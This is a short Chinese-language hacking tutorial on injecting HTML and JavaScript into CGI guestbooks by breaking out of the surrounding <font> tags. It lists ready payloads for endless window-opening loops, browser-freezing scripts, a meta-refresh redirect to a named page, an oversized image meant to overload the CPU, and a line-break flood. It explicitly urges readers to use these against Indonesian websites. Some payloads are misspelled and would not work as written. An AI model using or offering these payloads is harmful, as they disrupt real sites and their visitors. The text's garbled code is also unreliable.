CGI是把访客输入的留言变为一个变量,然后再把这个变量插入到显示留言的HTML文件
里。
访客输入的文本如要在HTML文件里显示就得符合HTML标准,而CGI程序里一般都加入了
特定的HTML语言。
当访客输入内容(变量X),插入HTML文件时,即同时插入到了头尾HTML语句中:
<font> 访客输入的变量X </font>
(当它插入到HTML文件时就显示了给内容〕
但如果我们把它给敝屏了,就可以.....做很多事情了。
如我们输入时打上:
</font> 符合HTML标准的语句 <font>
(前后的</font><font>是用来敝屏CGI中的HTML语句用的)
插入到HTML文件里的就变成了:
<font></font> 符合HTML标准的语句 <font></font>
比如,你想在留言板里显示一张图片,输入:
</font>
<a href="http://页面链接位置>图片</a></p><font>
你也可以输入javascript的语句,做一些你想做的事:
1.弄个死循环在上面,让他的浏览器死掉。可以这样输入:
<a href="http://XXX; onMouseover="while(1){window.close('/')}">
或<a herf="" onMousever="while(ture){window.close('/')}">
2.也可叫他打开指定的窗口:
<img src="javascript:n=1;do{window.open('http://指定的页)}while(n==2)" width=
"1">
或<meta http-equirv="refresh" content="1;url=http://你指定的页>
其中,1是指定的时间间隔。即当页面被查阅时,浏览器在给定的时间间隔内重新装载
你指定的页。
3.或叫他打开无数个浏览器窗口:
<img src="javascript:n=1;do{window.open('')}while(n==1)" width="1">
4.或弄张超级巨无霸的图片让他的CPU超负荷:
<img src="" width="1" height="100000000000000000000000000"></a></p>
很爽的,让它开N个窗口,或让它跳到一些XXX站点,(在次我已经做了一个样本页,
大家在黑印尼时可以用这个地址来重新载入http://chaonima.yeah.net)随你喜欢。
千万别来拿自己人开刀。你可以到印尼那去做你的实验,你会给他们一个惊喜的。
在输入完之后,最好检查一下你的作品,不要怕它跳到哪个不知名的站点,也不要怕
浏览器死了,
更不要怕被开很多窗口(你可关了JAVA),你看到自己的成绩会很开心的。
5.大家不知知到
换行符号吗!对了用复制法!输一千个给他!就可以炸了它!